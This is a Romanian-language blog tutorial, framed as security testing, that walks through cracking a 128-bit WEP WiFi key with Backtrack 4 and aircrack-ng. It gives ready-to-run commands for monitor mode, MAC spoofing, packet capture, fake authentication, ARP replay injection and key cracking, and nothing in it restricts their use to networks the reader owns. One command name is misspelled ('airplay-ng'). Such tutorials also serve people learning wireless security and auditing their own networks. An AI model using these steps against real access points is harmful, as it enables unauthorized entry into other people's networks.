Testarea securitatii retelelor wireless - Securitatea Informatica

Testarea securitatii retelelor wireless

Acest articol explica testarea securitatii WEP pe 128 biti (ex.: puncte de acces WIFI) folosind Backtrack, o distributie Linux live pentru testarea securitatii. Teoria de bază este că vrem să se conecteze la un punct de acces utilizând criptare WEP, dar nu ştim cheia. Vom incerca penetrarea routerului WiFi pentru a gasi cheia WEP.

Cerinţe:

  • Backtrack 4 pe CD sau USB
  • Calculator cu card wireless 802.11
  • Punct de acces fără fir sau router WiFi folosind criptarea WEP

Voi presupune că aţi descărcat şi aţi pornit Backtrack 4. Dacă nu aţi reusit asta, probabil că nu ar trebui să încercati testarea securitatii WEP :). Odată ce Backtrack este încărcat, deschide un shell şi efectuaţi următoarele:

Pregatirea Card WIFI

În primul rând cardul wifi trebuie să ne permită “Monitor Mode”. Dacă utilizaţi o placa wireless cu chipset Intel ® PRO / Wireless 3945ABG folositi următoarele comenzi:
modprobe -r iwl3945
modprobe ipwraw
Comenzile de mai sus va permit intrarea in modul monitorizare de pe chipset-ul wireless. Apoi:
iwconfig
si noteaza numele interfeţei adaptorul wireless. Apoi opriti adaptorul:
airmon-ng stop [device]
Apoi:
ifconfig down [interface]
Acum trebuie sa schimbam adresa MAC a adaptorului:
macchanger --mac 00:11:22:33:44:66 [device]
Acum sa pornim cardul WIFI în modul monitor:
airmon-ng start [device]
airmon-ngstart1.png

Atacarea tinta

Acum este momentul potrivit pentru a localiza un WEP activ de reţea:
airodump-ng [device]
airodumpwifi0.png
Asiguraţi-vă că notati adresa MAC (BSSID), canal (CH) şi numele (ESSID) din reteaua tinta. Acum trebuie să înceapă colectarea de date din punctul de acces WIFI pentru atac:
airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]
airodumpoutput.png
Comanda de mai sus va colecta datele de iesire in ‘network.out’. Acest fişier va fi folosit în programul WEP Crack atunci când suntem gata să spargem cheia WEP.
Deschide un alt shell. Acum, avem nevoie sa generam unele pachete false la punctul de acces pentru a accelera ieşirea de date. Testati punctul de acces cu următoarea comandă:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
aireplayfakeauth.png
Dacă această comandă are succes, va genera mai multe pachete pe reteaua tinta, astfel încât să putem sparge CHEIA. Scrieti:
airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
aireplaygenerateivs.png
Acesta comanda va forţa punctul de acces sa trimita o gramada de pachete pe care le putem folosi apoi pentru a sparge cheia WEP. Verificaţi shell aerodump-ng şi ar trebui să vedeţi “datele”.
captureivs_0.png
După aproximativ 10,000-20,000 puteţi începe spargerea cheii WEP. Dacă nu există alte gazde pe punctul de acces ţintă, puteţi încerca:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
aireplayattack2p.png
Odată ce aţi obtinut destul de pachete, de a începeti crackul:
aircrack-ng -n 128 -b [bssid] [filename]-01.cap
“-N 128″ semnifică un 128-bit WEP cheie. În cazul în care crackul nu reuşeşte, încercaţi o cheie de 64 de biţi prin modificarea valorii de la N 64.
crackng.png

Twitter Digg Delicious Stumbleupon Technorati Facebook


Nici un comentariu inca... Fii primul care lasa un comentariu!

Lasa un raspuns

This site is protected by Comment SPAM Wiper. This site is protected by WP-CopyRightPro